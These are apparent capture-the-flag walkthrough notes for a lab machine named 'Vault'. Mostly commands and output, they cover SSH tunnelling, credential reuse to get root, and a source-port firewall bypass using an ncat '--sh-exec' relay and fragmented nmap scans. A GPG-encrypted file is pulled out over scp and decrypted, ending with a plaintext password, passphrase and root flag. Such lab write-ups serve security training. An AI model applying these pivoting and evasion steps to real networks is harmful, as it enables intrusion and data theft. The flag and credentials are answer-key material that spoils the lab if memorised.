ACCESS WEBSITE FROM SERVERssh -D 8080 dave@10.10.10.109===================

1. ACCESS WEBSITE FROM SERVER
2. ssh -D 8080 dave@10.10.10.109
3.  
4. ==============================================================================================================
5. REWORK THIS AREA
6. ==============================================================================================================
7. MORE CREDENTIALS FOUND
8. root@DNS: var www DNS desktop# cat ssh
9. dave
10. dav3gerous567
11.  
12. SSH INTO DNS SERVER
13. ssh dave@192.168.122.4
14. dav3gerous567
15.  
16. READ ALEX .BASG_HISTORY AND LOOKED AT VISUDO FILE WHICH LETS ADMINS SUDO AS ROOT
17.  
18. BECOME ROOT
19. sudo su -
20. dav3gerous567
21.  
22. TRACEROUTE (using port 1723/tcp)
23. HOP RTT ADDRESS
24. 1 0.82 ms 192.168.5.1
25.  
26. Nmap scan report for Vault (192.168.5.2)
27. Host is up (0.0021s latency).
28. Not shown: 998 filtered ports
29. PORT STATE SERVICE VERSION
30. 53/tcp closed domain
31. 4444/tcp closed krb524
32. Too many fingerprints match this host to give specific OS details
33. Network Distance: 2 hops
34.  
35. TRACEROUTE (using port 53/tcp)
36. HOP RTT ADDRESS
37. 1 0.98 ms 192.168.122.5
38. 2 1.86 ms Vault (192.168.5.2)
39.  
40. HOW TO +++++====================================================================================================
41. SEE WHAT PORTS ARE OPEN ON VAULT
42. cat /var/log/auth.log | grep -a 192.168.5.2
43. (port 4444 is used for ssh)
44.  
45. SET UP A LISTENER
46. ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
47.  
48. ENSURE PORT IS OPEN
49. /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
50.  
51. SSH IN
52. ssh dave@localhost -p 5555
53.  
54. IS PORT BEING USED BY SOMEONE ELSE
55. ps aux | grep ncat
56.  
57. dave@vault:~$ ls
58. root.txt.gpg
59.  
60. SCP IT BACK TO UBUNTU MACHINE ENSURE NCAT IS WORKING
61. root@DNS:~# ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444" &
62. [1] 14627
63.  
64. COPY FILE FROM VAULT TO DNS USING SCP FROM DNS
65. root@DNS:~# scp -P 5555 dave@localhost:/home/dave/root.txt.gpg /tmp
66. dave@localhost's password:
67. root.txt.gpg 100% 629 0.6KB/s 00:00
68. [1]+ Done ncat -l 5555 --sh-exec "ncat 192.168.5.2 987 --source-port=4444"
69. root@DNS:~# cd /tmp
70. root@DNS:/tmp# ls
71. root.txt.gpg test.txt
72.  
73. COPY FILE FROM DNS TO UBUNTU FROM THE UBUNTU MACHINE
74. dave@ubuntu:~$ scp dave@192.168.122.4:/tmp/root.txt.gpg /dev/shm/
75. dave@192.168.122.4's password:
76. root.txt.gpg 100% 629 0.6KB/s 00:00
77. dave@ubuntu:~$ cd /dev/shm
78.  
79. DECRYPT THE GPG ROOT FILE USING THE KEY FOUND IN DAVES DESKTOP FOLDER
80. dave@ubuntu:/dev/shm$ gpg -d root.txt.gpg
81.  
82. You need a passphrase to unlock the secret key for
83. user: "david <dave@david.com>"
84. 4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)
85.  
86. gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
87. "david <dave@david.com>"
88. itscominghome
89.  
90. ROOT FILE
91. ca468370b91d1f5906e31093d9bfe819